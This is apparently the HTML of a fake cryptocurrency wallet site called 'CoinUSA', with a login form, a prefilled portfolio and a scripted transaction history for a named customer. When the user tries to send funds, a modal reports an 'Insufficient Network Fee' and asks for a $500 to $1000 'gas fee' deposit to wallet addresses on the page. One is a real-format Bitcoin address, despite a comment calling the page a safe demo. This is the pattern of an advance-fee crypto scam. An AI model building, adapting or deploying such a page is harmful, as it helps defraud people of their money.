<!-- Login Page Section -->
<section id="login" class="view active">
  <h2 class="view-title">Login CoinUSA🇺🇸</h2>
  
  <form id="loginForm" class="form">
    <div class="form-group">
      <label for="loginPhone">Phone Number</label>
      <input
        id="loginPhone"
        type="text"
        class="input"
        placeholder="e.g. +1 1234567890"
        required
      />
    </div>

    <div class="form-group">
      <label for="loginPassword">Password</label>
      <input
        id="loginPassword"
        type="password"
        class="input"
        placeholder="********"
        required
      />
    </div>

    <div class="form-group">
      <a href="#" class="forgot-password">Forgot Password?</a>
    </div>

    <button type="submit" class="primary-btn">
      Login
    </button>

    <p class="signup-link">
      Already have an Account? <a href="#" id="signupLink">Sign up</a>
    </p>
  </form>
</section>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Crypto Dashboard</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="stylesheet" href="styles.css" />
  <!-- Chart.js for the market cap chart -->
  <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
</head>
<body>
  <div class="app">

    <!-- Top bar -->
    <header class="top-bar">
      <div class="status-pip"></div>
      <div class="top-title">CoinUSA🇺🇸 Wallet</div>
      <div class="top-right">⋯</div>
    </header>

    <!-- Welcome / portfolio -->
    <section class="welcome-section">
      <p class="welcome-text">
        Welcome, Ashley Coleman.<span id=""></span>
      </p>

      <div class="portfolio-card">
        <div class="portfolio-row">
          <span class="label">Total Portfolio Value</span>
          <span id="totalPortfolio" class="value">$0.00</span>
        </div>
        <div class="portfolio-row">
          <span class="label">Total Portfolio Value in BTC</span>
          <span id="totalPortfolioBtc" class="value">Loading…</span>
        </div>
      </div>
    </section>

    <!-- Main action tabs -->
    <nav class="action-tabs">
      <button class="tab active" data-section="overview">Overview</button>
      <button class="tab" data-section="send">Send</button>
      <button class="tab" data-section="receive">Receive</button>
      <button class="tab" data-section="buy">Buy</button>
      <button class="tab" data-section="history">History</button>
      <button class="tab" data-section="connect">Connect Wallet</button>
    </nav>

    <main>
      <!-- ====== OVERVIEW ====== -->
      <section id="overview" class="view active">
        <h2 class="view-title">Your Holdings</h2>
        <div id="holdingsList" class="holdings-list">
          <!-- Populated by JS -->
        </div>

        <h3 class="section-subtitle">Market Overview (Live)</h3>
        <p id="marketsStatus" class="helper-text">
          Loading live market data…
        </p>

        <!-- Live markets table (top 100 coins) -->
        <div class="table-wrapper">
          <table class="markets-table">
            <thead>
              <tr>
                <th>#</th>
                <th>Coin</th>
                <th>Price (USD)</th>
                <th>24h %</th>
                <th>Market Cap</th>
              </tr>
            </thead>
            <tbody id="marketsBody">
              <!-- Filled by JS -->
            </tbody>
          </table>
        </div>

        <!-- Market cap chart -->
        <div class="chart-wrapper">
          <canvas id="marketChart"></canvas>
        </div>
      </section>

      <!-- ====== SEND ====== -->
      <section id="send" class="view">
        <h2 class="view-title">Crypto Transfer</h2>

        <div class="portfolio-card small">
          <div class="portfolio-row">
            <span class="label">Total Portfolio Value</span>
            <span id="sendTotalPortfolio" class="value">$0.00</span>
          </div>
          <div class="portfolio-row">
            <span class="label">Total Portfolio Value in BTC</span>
            <span id="sendTotalPortfolioBtc" class="value">Loading…</span>
          </div> GAS FEE: $13.7
        </div> 

        <form id="sendForm" class="form">
          <div class="form-group">
            <label for="sendAsset">Asset to Send</label>
            <select id="sendAsset" class="input">
              <option value="BTC">Bitcoin (BTC)</option>
              <option value="ETH">Ethereum (ETH)</option>
              <option value="SOL">Solana (SOL)</option>
            </select>
          </div>

          <div class="form-group">
            <label for="sendAddress">Enter Crypto Address</label>
            <input
              id="sendAddress"
              type="text"
              class="input"
              placeholder="e.g. 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
              required
            />
          </div>

          <div class="form-group">
            <div class="label-row">
              <label for="sendAmount">Amount to Transfer (USD)</label>
              <span class="available-text">
                Available: <span id="availableForAsset">$0.00</span>
              </span>
            </div>
            <input
              id="sendAmount"
              type="number"
              class="input"
              step="0.01"
              min="0"
              placeholder="0.00"
              required
            />
          </div>

          <div class="percentage-buttons">
            <button type="button" class="pill-btn" data-percent="10">10%</button>
            <button type="button" class="pill-btn" data-percent="25">25%</button>
            <button type="button" class="pill-btn" data-percent="50">50%</button>
            <button type="button" class="pill-btn" data-percent="100">Max</button>
          </div>

          <p class="warning-text">
            Warning: Please double-check the destination address. Crypto transfers
            cannot be reversed once confirmed.
          </p>

          <button type="submit" class="primary-btn">
            Enter
          </button>
        </form>
      </section>

      <!-- ====== RECEIVE ====== -->
      <section id="receive" class="view">
        <h2 class="view-title">Receive Crypto</h2>
        <p class="helper-text">
          Copy your wallet address to receive coins. 
        </p>
        <div class="receive-list">
          <div class="receive-row">
            <div>
              <div class="asset-name">Bitcoin (BTC)</div>
              <div class="asset-sub address">
                12GTiRRxxTH1nPHHLBSVv7oBHToMWeZdhz
              </div>
            </div>
            <button
              class="secondary-btn copy-btn"
              data-address="12GTiRRxxTH1nPHHLBSVv7oBHToMWeZdhz"
            >
              Copy
            </button>
          </div>
          <div class="receive-row">
            <div>
              <div class="asset-name">Ethereum (ETH)</div>
              <div class="asset-sub address">
                0xDemoEthAddress1234abcd...
              </div>
            </div>
            <button class="secondary-btn copy-btn" data-address="0xDemoEthAddress1234abcd">
              Copy
            </button>
          </div>
          <div class="receive-row">
            <div>
              <div class="asset-name">Solana (SOL)</div>
              <div class="asset-sub address">
                DemoSolAddress98lmn0pqrs...
              </div>
            </div>
            <button class="secondary-btn copy-btn" data-address="DemoSolAddress98lmn0pqrs">
              Copy
            </button>
          </div>
        </div>
      </section>

      <!-- ====== BUY ====== -->
      <section id="buy" class="view">
        <h2 class="view-title">Buy Crypto</h2>
        <div class="coming-soon-card">
          <p class="coming-title">Coming Soon</p>
          <p class="coming-text">
            
          </p>
        </div>
      </section>

      <!-- ====== HISTORY ====== -->
      <section id="history" class="view">
        <h2 class="view-title">Transaction History</h2>
        <p class="helper-text">
          History from June 2023 to August 2025. Deposits and withdrawals
         
        </p>
        <div class="table-wrapper">
          <table class="history-table">
            <thead>
              <tr>
                <th>Date &amp; Time</th>
                <th>Asset</th>
                <th>Type</th>
                <th>Amount (USD)</th>
                <th>Status</th>
              </tr>
            </thead>
            <tbody>
              <!-- BTC: 13 deposits, 3 withdrawals (net = 31,775.11) -->
              <tr><td>2023-06-10 14:30</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-07-01 15:43</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-07-22 16:56</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-08-12 18:09</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-09-02 19:22</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-09-23 20:35</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-10-14 21:48</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-11-04 23:01</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-11-25 00:14</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2023-12-16 01:27</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2024-01-06 02:40</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2024-01-27 03:53</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2024-02-17 05:06</td><td>BTC</td><td>Deposit</td><td>+$3213.47</td><td>Completed</td></tr>
              <tr><td>2024-03-09 06:19</td><td>BTC</td><td>Withdrawal</td><td>-$3333.34</td><td>Completed</td></tr>
              <tr><td>2024-03-30 07:32</td><td>BTC</td><td>Withdrawal</td><td>-$3333.33</td><td>Completed</td></tr>
              <tr><td>2024-04-20 08:45</td><td>BTC</td><td>Withdrawal</td><td>-$3333.33</td><td>Completed</td></tr>

              <!-- SOL: 7 deposits, 3 withdrawals (net = 7,000.00) -->
              <tr><td>2024-05-11 10:58</td><td>SOL</td><td>Deposit</td><td>+$1428.58</td><td>Completed</td></tr>
              <tr><td>2024-06-01 12:11</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-06-22 13:24</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-07-13 14:37</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-08-03 15:50</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-08-24 17:03</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-09-14 18:16</td><td>SOL</td><td>Deposit</td><td>+$1428.57</td><td>Completed</td></tr>
              <tr><td>2024-10-05 19:29</td><td>SOL</td><td>Withdrawal</td><td>-$1000.00</td><td>Completed</td></tr>
              <tr><td>2024-10-26 20:42</td><td>SOL</td><td>Withdrawal</td><td>-$1000.00</td><td>Completed</td></tr>
              <tr><td>2024-11-16 21:55</td><td>SOL</td><td>Withdrawal</td><td>-$1000.00</td><td>Completed</td></tr>

              <!-- ETH: 4 deposits, 7 withdrawals (net = 4,032.00) -->
              <tr><td>2024-12-07 23:08</td><td>ETH</td><td>Deposit</td><td>+$1383.00</td><td>Completed</td></tr>
              <tr><td>2024-12-28 00:21</td><td>ETH</td><td>Deposit</td><td>+$1383.00</td><td>Completed</td></tr>
              <tr><td>2025-01-18 01:34</td><td>ETH</td><td>Deposit</td><td>+$1383.00</td><td>Completed</td></tr>
              <tr><td>2025-02-08 02:47</td><td>ETH</td><td>Deposit</td><td>+$1383.00</td><td>Completed</td></tr>
              <tr><td>2025-03-01 04:00</td><td>ETH</td><td>Withdrawal</td><td>-$214.28</td><td>Completed</td></tr>
              <tr><td>2025-03-22 05:13</td><td>ETH</td><td>Withdrawal</td><td>-$214.28</td><td>Completed</td></tr>
              <tr><td>2025-04-12 06:26</td><td>ETH</td><td>Withdrawal</td><td>-$214.28</td><td>Completed</td></tr>
              <tr><td>2025-05-03 07:39</td><td>ETH</td><td>Withdrawal</td><td>-$214.29</td><td>Completed</td></tr>
              <tr><td>2025-05-24 08:52</td><td>ETH</td><td>Withdrawal</td><td>-$214.29</td><td>Completed</td></tr>
              <tr><td>2025-06-14 10:05</td><td>ETH</td><td>Withdrawal</td><td>-$214.29</td><td>Completed</td></tr>
              <tr><td>2025-08-15 11:42</td><td>ETH</td><td>Withdrawal</td><td>-$214.29</td><td>Completed</td></tr>
            </tbody>
          </table>
        </div>
      </section>

      <!-- ====== CONNECT WALLET ====== -->
      <section id="connect" class="view">
        <h2 class="view-title">Connect Wallet</h2>
        <div class="coming-soon-card">
          <p class="coming-title">Coming Soon</p>
          <p class="coming-text">
           
          </p>
        </div>
      </section>
    </main>
  </div>

  <!-- Modal for "gas fee" explanation (safe demo, NO deposit address) -->
  <div id="gasModal" class="modal hidden">
    <div class="modal-content">
      <h3 class="modal-title">Insufficient Network Fee </h3>
      <p class="modal-text">
        
        
       To execute your transfer you need to purchase ”gas”  
        min:$500        max:$1000 
        
   <strong> </strong>. To purchage GAS go to: 'RECIEVE' copy your BTC, ETH or SOL wallet address and deposit with a narration 'GAS FEE'
      </p>
      <p class="modal-text">
     
      
      </p>
      <p class="modal-text">
        
      </p>
      <button id="closeModal" class="primary-btn modal-btn">
        Close
      </button>
    </div>
  </div>

  <script src="app.js"></script>
</body>
</html>
